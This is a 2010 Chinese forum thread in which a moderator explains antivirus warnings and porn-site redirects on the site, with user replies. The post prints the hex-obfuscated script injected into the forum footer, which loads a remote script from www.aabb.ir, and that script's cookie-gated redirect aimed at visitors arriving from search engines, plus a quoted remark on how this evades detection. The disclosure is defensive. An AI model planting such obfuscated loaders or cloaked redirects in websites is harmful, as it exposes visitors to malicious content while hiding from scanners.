设为首页收藏本站新闻投稿

MOD中国同盟社

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 4783|回复: 21

[公告] 关于近期访问我站杀软报毒及跳转黄网的紧急公告     [复制链接]

Super Moderator

此人已辞职,有事找别人.

Rank: 10Rank: 10Rank: 10

帖子
2341
精华
3
声望
9852 点
金币
3913 Mold
被赞许
-37 次
注册时间
2004-7-17

Modchina元老

发表于 2010-12-27 22:46:10 |显示全部楼层
1.先说杀软报毒 确有其事 并非误报!
报毒的主要是小红伞Avira 以及AVG 两款杀毒软件都是十分优秀的国际杀毒软件 查毒率和误报率都很高 属于比较敏感的 适合用于防卫
Avira警报:

AVG警报:
特定出的问题代码如下:
  1. <script type="text/javascript">
  2. if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime ()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
  3. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74  \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x62\x62\x2e\x69\x72 \x2f\x41\x64\x2f\x67\x2e\x6a\x73\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');}
  4. </script>
复制代码
这段代码我17号特定出来给Marshal看 但当时我们都没仔细理会这些用十六进制表示的字符串是什么功能 就当作是误报
其实如果你在地址栏
javascript:window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74  \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x62\x62\x2e\x69\x72 \x2f\x41\x64\x2f\x67\x2e\x6a\x73\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); 这么一输入 就会开始访问www.aabb.ir 这个网站上有很多恶意脚本

2.再说近日部分用户反映访问论坛跳转至某黄网的问题
此问题的确存在 我站没有被挂马 而是footer被挂了一小段极其隐秘的代码 调用远程www.aabb.ir/Ad/g.js恶意脚本
此恶意脚本内容如下:
  1. var cookieString=document.cookie; var start=cookieString.indexOf("cookiesleep"); if(start!=-1){}else{var expires=new Date(); expires.setTime(expires.getTime()+6*60*60*1000); document.cookie="cookiesleep=test;expires="+expires.toGMTString(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|gougou|)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)){setTimeout('window.location.href="http://www.haose14.com/html/photo/toupaizipai/index.html";',0000);} }
复制代码
相关资料:《网马的反挂马检测及精确投放(续)》
http://hi.baidu.com/monyer/blog/ ... ac1158b219a85e.html
简单来说就是:
直接访问页面不会挂马,如果通过搜索引擎进来的,则中招!
如果再狠一些,限制个时间啥的就更NB了,哈哈。
这样做的一个好处是可以直接bypass挂马检测系统,因为挂马检测系统大都是基于行为分析的;并且可以迷惑一些分析者,只是如果能做在服务端就更好了。

这种脚本的作用是当用户从特定的域名转向我站 cookies发生更新时 会跳转到指定的黄网页面
而输入网址或通过收藏夹直接访问我站域名的用户虽然首次访问也会下载此脚本 但并不会执行跳转 因此有人遇到问题有人说完全没问题
该脚本和黑客篡改行为目的大概就是要搞臭我们 都是具有相当高的隐蔽性(在此要特别感谢协助我们特定出问题脚本代码的用户)
但好在对用户没有什么严重的安全威胁 如果你不幸看到黄网页面请洁身自好 立即关闭 就不会带来任何问题
此问题已修复 应该不会再出现这种情况了

PS:
此次风波前后很多用户在反映问题 我的确很早就发现了 但是我和Marshal当时没仔细看代码 下了错误判断 造成问题多延误了十多天 这是我们管理工作的严重失误 我在此表示歉意和深刻反省!!!另外也希望一些用户多了解网页、浏览器操作、系统安全的知识 有些常识还是要知道的 提高自我保护能力 同时也为维护社区安全尽一份责任
最后我也要感谢你们坚持不懈地反映客观存在的问题 让我不得不重新重视起来 感谢大家的支持了!!

此问题尚未修复 论坛主机可能被挂马 近期仍可能会关闭论坛停机维护 给各位造成不便敬请原谅!!


PSS:
这次很多人用的360 瑞星 金山都对此亮绿灯 甚至是NOD Avast!都没查出来 各位应该清楚国内外杀软公司实力的差距了吧 国产安全软件从未进过世界排名前50强
绝对不要完全依赖360 瑞星 金山等国内安全软件!即使同样是面对国内土生土产的威胁他们也未必表现得更出色
Avira和AVG真的都非常优秀 如果被报问题的确应引起足够重视和仔细分析
附件: 你需要登录才可以下载或查看附件。没有帐号?注册
此号待删除,不再登陆.

使用道具 举报

Rank: 3Rank: 3

帖子
0
精华
0
声望
110 点
金币
40 Mold
被赞许
3 次
注册时间
2009-6-18
发表于 2010-12-27 23:00:35 |显示全部楼层
表示杯具过一次
以后会小心再小心

使用道具 举报

Rank: 10Rank: 10Rank: 10

帖子
625
精华
0
声望
4677 点
金币
283 Mold
被赞许
11 次
注册时间
2010-11-3

可爱小猫 懒人勋章

发表于 2010-12-27 23:13:09 |显示全部楼层
这就好拉~~哈哈,希望论坛能做得更好把~

使用道具 举报

Operation Officer

中国FPS联盟—顶点小组

Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20

帖子
1551
精华
8
声望
19074 点
金币
19321 Mold
被赞许
701 次
注册时间
2009-5-12

Mod中国同盟社至高荣誉 MTT职员 模界神人奖 最佳贡献奖 优秀版主奖 起源天才奖 模纹达人奖 热心会员奖 地图神作奖 新人进步奖 懒人勋章 可爱小猫 黑暗使者 Modchina元老 精华帖制造者 Modchina灌水王 星界财团 积分霸主 图界之神 MagicTime使者

发表于 2010-12-28 01:25:50 |显示全部楼层
来点黄网看看啊···别都封了= =把网址给我
已有 4 人评分声望 收起 理由
zouxingyue -1 头像啊 注意啊
傻鱼 + 5 看你头像就知道,唉~何必呢,同求 ...
阿发 -5 Respect yourself!!
hao12345 + 2 你真色

总评分: 声望 + 1   查看全部评分

使用道具 举报

Rank: 7Rank: 7Rank: 7

帖子
670
精华
1
声望
1932 点
金币
366 Mold
被赞许
1 次
注册时间
2009-4-15
发表于 2010-12-28 03:22:00 |显示全部楼层
终于好了,找到原因啦
同志们呐,,手上的金币也不能留过夜的...就大把大把的朝我砸来吧...

使用道具 举报

Rank: 5Rank: 5

帖子
428
精华
0
声望
825 点
金币
31 Mold
被赞许
1 次
注册时间
2010-8-31
发表于 2010-12-28 10:18:19 |显示全部楼层
回复 4# 32550163qq


  我也是啊,还好我记录下来了
已有 2 人评分声望 金币 收起 理由
阿发 -5 -1
无语。。A + 1 自重。。。。

总评分: 声望 -5  金币 0   查看全部评分

如回复雷同,纯属虚构!

使用道具 举报

Rank: 5Rank: 5

帖子
562
精华
0
声望
1290 点
金币
143 Mold
被赞许
7 次
注册时间
2010-9-23

懒人勋章

发表于 2010-12-28 10:56:16 |显示全部楼层
論壇和誰結仇了?建議找那個人好好談談,以和為貴
已有 1 人评分声望 收起 理由
阿发 + 1 找不出来是谁

总评分: 声望 + 1   查看全部评分

使用道具 举报

Super Moderator

职业杀手

Rank: 10Rank: 10Rank: 10

帖子
1592
精华
0
声望
6291 点
金币
1753 Mold
被赞许
51 次
注册时间
2009-9-29

热心会员奖 黑暗使者 可爱小猫

发表于 2010-12-28 12:29:39 |显示全部楼层
4、6楼两位童鞋注意和谐 = =

使用道具 举报

Rank: 7Rank: 7Rank: 7

帖子
471
精华
0
声望
2399 点
金币
494 Mold
被赞许
2 次
注册时间
2010-7-17
发表于 2010-12-28 14:34:29 |显示全部楼层
太好了,现在打开页面不会报毒了。

使用道具 举报

Rank: 2

帖子
49
精华
0
声望
341 点
金币
60 Mold
被赞许
0 次
注册时间
2010-11-28
发表于 2010-12-28 16:00:36 |显示全部楼层
求地址?????看来我来迟了
已有 1 人评分声望 收起 理由
zouxingyue -2 还想要地址码?

总评分: 声望 -2   查看全部评分

我喜欢cs,一起来大改造把

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

回顶部